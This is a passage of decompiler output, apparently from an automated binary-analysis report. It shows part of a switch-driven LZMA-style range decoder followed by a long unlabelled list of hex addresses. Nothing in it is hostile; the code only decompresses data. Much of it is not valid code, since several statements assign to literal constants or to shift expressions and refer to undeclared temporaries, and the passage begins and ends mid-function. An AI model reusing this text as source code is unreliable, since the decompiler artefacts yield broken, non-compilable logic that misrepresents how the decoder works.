												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}

0x00000000
0x00406c97
0x00406c97
0x00406c9b
0x00406ca8
0x00406cb2
0x00000000
0x00406c9d
0x00406c9d
0x00406cd8
0x00406cdb
0x00406cde
0x00406ce1
0x00406ce1
0x00406ce4
0x00406ceb
0x00406cf0
0x00406bd1
0x00406bd4
0x00406f46
0x00406f46
0x00406f46
0x00406f49
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00406f97
0x00406f9b
0x0040714a
0x00407160
0x00407168
0x0040716f
0x00407171
0x00407178
0x0040717c
0x0040717c
0x00406fa7
0x00406fae
0x00406fb6
0x00406fb9
0x00406fbc
0x00406fbc
0x00406fc2
0x00406fc2
0x0040675e
0x0040675e
0x0040675e
0x00406767
0x00000000
0x00000000
0x0040676d
0x00000000
0x00406778
0x00000000
0x00000000
0x00406781
0x00406784
0x00406787
0x0040678b
0x00000000
0x00000000
0x00406791
0x00406794
0x00406796
0x00406797
0x0040679a
0x0040679c
0x0040679d
0x0040679f
0x004067a2
0x004067a7
0x004067ac
0x004067b5
0x004067c8
0x004067cb
0x004067d7
0x004067ff
0x00406801
0x0040680f
0x0040680f
0x00406813
0x00000000
0x00000000
0x00000000
0x00000000
0x00406803
0x00406803
0x00406806
0x00406807
0x00406807
0x00000000
0x00406803
0x004067dd
0x004067e2
0x004067e2
0x004067eb
0x004067f3
0x004067f6
0x00000000
0x004067fc
0x004067fc
0x00000000
0x004067fc
0x00000000
0x00406819
0x00406819
0x0040681d
0x004070c9
0x00000000
0x004070c9
0x00406826
0x00406836
0x00406839
0x0040683c
0x0040683c
0x0040683c
0x0040683f
0x00406843
0x00000000
0x00000000
0x00406845
0x0040684b
0x00406875
0x0040687b
0x00406882
0x00000000
0x00406882
0x00406851
0x00406854
0x00406859
0x00406859
0x00406864
0x0040686c
0x0040686f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068b4
0x004068ba
0x004068bd
0x004068ca
0x004068d2
0x00406f46
0x00406f46
0x00000000
0x00000000
0x00406889
0x00406889
0x0040688d
0x004070d8
0x00000000
0x004070d8
0x00406899
0x004068a4
0x004068a4
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b2
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f49
0x00406f49
0x00406f4f
0x00406f55
0x00406f5b
0x00406f75
0x00406f78
0x00406f7e
0x00406f89
0x00406f8b
0x00406f5d
0x00406f5d
0x00406f6c
0x00406f70
0x00406f70
0x00406f95
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004068da
0x004068dc
0x004068df
0x00406950
0x00406953
0x00406956
0x0040695d
0x00406967
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x004068e1
0x004068e5
0x004068e8
0x004068ea
0x004068ed
0x004068f0
0x004068f2
0x004068f5
0x004068f7
0x004068fc
0x004068ff
0x00406902
0x00406906
0x0040690d
0x00406910
0x00406917
0x0040691b
0x00406923
0x00406923
0x00406923
0x0040691d
0x0040691d
0x0040691d
0x00406912
0x00406912
0x00406912
0x00406927
0x0040692a
0x00406948
0x0040694a
0x00000000
0x0040692c
0x0040692c
0x0040692f
0x00406932
0x00406935
0x00406937
0x00406937
0x00406937
0x0040693a
0x0040693d
0x0040693f
0x00406940
0x00406943
0x00000000
0x00406943
0x00000000
0x00406b79
0x00406b7d
0x00406b9b
0x00406b9e
0x00406ba5
0x00406ba8
0x00406bab
0x00406bae
0x00406bb1
0x00406bb4
0x00406bb6
0x00406bbd
0x00406bbe
0x00406bc0
0x00406bc3
0x00406bc6
0x00406bc9
0x00406bc9
0x00406bce
0x00000000
0x00406bce
0x00406b7f
0x00406b82
0x00406b85
0x00406b8f
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406be3
0x00406be7
0x00406c0a
0x00406c0d
0x00406c10
0x00406c1a
0x00406be9
0x00406be9
0x00406bec
0x00406bef
0x00406bf2
0x00406bff
0x00406c02
0x00406c02
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00000000
0x00406c26
0x00406c2a
0x00000000
0x00000000
0x00406c30
0x00406c34
0x00000000
0x00000000
0x00406c3a
0x00406c3c
0x00406c40
0x00406c40
0x00406c43
0x00406c47
0x00000000
0x00000000
0x00000000
0x00000000
0x00406cbe
0x00406cc2
0x00406cc9
0x00406ccc
0x00406ccf
0x00406cc4
0x00406cc4
0x00406cc4
0x00406cd2
0x00406cd5
0x00000000
0x00000000
0x00406d7e
0x00406d7e
0x00406d82
0x00407120
0x00000000
0x00407120
0x00406d88
0x00406d8b
0x00406d8e
0x00406d92
0x00406d95
0x00406d9b
0x00406d9d
0x00406d9d
0x00406d9d
0x00406da0
0x00406da3
0x00000000
0x00000000
0x00406973
0x00406973
0x00406977
0x004070e4
0x00000000
0x004070e4
0x0040697d
0x00406980
0x00406983
0x00406987
0x0040698a
0x00406990
0x00406992
0x00406992
0x00406992
0x00406995
0x00406998
0x00406998
0x0040699b
0x0040699e
0x00000000
0x00000000
0x004069a4
0x004069aa
0x00000000
0x00000000
0x004069b0
0x004069b0
0x004069b4
0x004069b7
0x004069ba
0x004069bd
0x004069c0
0x004069c1
0x004069c4
0x004069c6
0x004069cc
0x004069cf
0x004069d2
0x004069d5
0x004069d8
0x004069db
0x004069de
0x004069fa
0x004069fd
0x00406a00
0x00406a03
0x00406a0a
0x00406a0e
0x00406a10
0x00406a14
0x004069e0
0x004069e0
0x004069e4
0x004069ec
0x004069f1
0x004069f3
0x004069f5
0x004069f5
0x00406a17
0x00406a1e
0x00406a21
0x00000000
0x00406a27
0x00000000
0x00406a27
0x00000000
0x00406a2c
0x00406a2c
0x00406a30
0x004070f0
0x00000000
0x004070f0
0x00406a36
0x00406a39
0x00406a3c
0x00406a40
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a4e
0x00406a51
0x00406a51
0x00406a51
0x00406a57
0x00000000
0x00000000
0x00406a59
0x00406a5c
0x00406a5f
0x00406a62
0x00406a65
0x00406a68
0x00406a6b
0x00406a6e
0x00406a71
0x00406a74
0x00406a77
0x00406a8f
0x00406a92
0x00406a95
0x00406a98
0x00406a98
0x00406a9b
0x00406a9f
0x00406aa1
0x00406a79
0x00406a79
0x00406a81
0x00406a86
0x00406a88
0x00406a8a
0x00406a8a
0x00406aa4
0x00406aab
0x00406aae
0x00000000
0x00406ab0
0x00000000
0x00406ab0
0x00406aae
0x00406ab5
0x00406ab5
0x00406ab5
0x00406ab5
0x00000000
0x00000000
0x00406af0
0x00406af0
0x00406af4
0x004070fc
0x00000000
0x004070fc
0x00406afa
0x00406afd
0x00406b00
0x00406b04
0x00406b07
0x00406b0d
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b12
0x00406b15
0x00406b15
0x00406b1b
0x00406ab9
0x00406ab9
0x00406abc
0x00000000
0x00406abc
0x00406b1d
0x00406b1d
0x00406b20
0x00406b23
0x00406b26
0x00406b29
0x00406b2c
0x00406b2f
0x00406b32
0x00406b35
0x00406b38
0x00406b3b
0x00406b53
0x00406b56
0x00406b59
0x00406b5c
0x00406b5c
0x00406b5f
0x00406b63
0x00406b65
0x00406b3d
0x00406b3d
0x00406b45
0x00406b4a
0x00406b4c
0x00406b4e
0x00406b4e
0x00406b68
0x00406b6f
0x00406b72
0x00000000
0x00406b74
0x00000000
0x00406b74
0x00000000
0x00406e01
0x00406e01
0x00406e05
0x0040712c
0x00000000
0x0040712c
0x00406e0b
0x00406e0e
0x00406e11
0x00406e15
0x00406e18
0x00406e1e
0x00406e20
0x00406e20
0x00406e20
0x00406e23
0x00000000
0x00000000
0x00000000
0x00000000
0x00406f10
0x00406f14
0x00406f36
0x00406f39
0x00406f43
0x00406f46
0x00406f46
0x00406f46
0x00000000
0x00406f46
0x00406f46
0x00406f16
0x00406f19
0x00406f1d
0x00406f20
0x00406f20
0x00406f23
0x00000000
0x00000000
0x00406fcd
0x00406fd1
0x00406fef
0x00406fef
0x00406fef
0x00406ff6
0x00406ffd
0x00407004
0x00407004
0x00000000
0x00407004
0x00406fd3
0x00406fd6
0x00406fd9
0x00406fdc
0x00406fe3
0x00406f27
0x00406f27
0x00406f2a
0x00000000
0x00000000
0x004070be
0x004070c1
0x00406fc2
0x00000000
0x00000000
0x00406cf8
0x00406cfa
0x00406d01
0x00406d02
0x00406d04
0x00406d07
0x00000000
0x00000000
0x00406d0f
0x00406d12
0x00406d15
0x00406d17
0x00406d19
0x00406d19
0x00406d1a
0x00406d1d
0x00406d24
0x00406d27
0x00406d35
0x00000000
0x00000000
0x0040700b
0x0040700b
0x0040700e
0x00407015
0x00000000
0x00000000
0x0040701a
0x0040701a
0x0040701e
0x00407156
0x00000000
0x00407156
0x00407024
0x00407027
0x0040702a
0x0040702e
0x00407031
0x00407037
0x00407039
0x00407039
0x00407039
0x0040703c
0x0040703f
0x0040703f
0x0040703f
0x0040703f
0x00407042
0x00407042
0x00407046
0x004070a6
0x004070a9
0x004070ae
0x004070af
0x004070b1
0x004070b3
0x004070b6
0x00406fc2
0x00406fc2
0x00000000
0x00406fc8
0x00406fc2
0x00407048
0x0040704e
0x00407051
0x00407054
0x00407057
0x0040705a
0x0040705d
0x00407060
0x00407063
0x00407066
0x00407069
0x00407082
0x00407085
0x00407088
0x0040708b
0x0040708f
0x00407091
0x00407091
0x00407092
0x00407095
0x0040706b
0x0040706b
0x00407073
0x00407078
0x0040707a
0x0040707d
0x0040707d
0x00407098
0x0040709f
0x00000000
0x004070a1
0x00000000
0x004070a1
0x00000000
0x00406d3d
0x00406d40
0x00406d76
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea6
0x00406ea9
0x00406ea9
0x00406eac
0x00406eae
0x00407138
0x00000000
0x00407138
0x00406eb4
0x00406eb7
0x00000000
0x00000000
0x00406ebd
0x00406ec1
0x00406ec4
0x00406ec4
0x00406ec4
0x00000000
0x00406ec4
0x00406d42
0x00406d44
0x00406d46
0x00406d48
0x00406d4b
0x00406d4c
0x00406d4e
0x00406d50
0x00406d53
0x00406d56
0x00406d6c
0x00406d71
0x00406da9
0x00406da9
0x00406dad
0x00406dd9
0x00406ddb
0x00406de2
0x00406de5
0x00406de8
0x00406de8
0x00406ded
0x00406ded
0x00406def
0x00406df2
0x00406df9
0x00406dfc
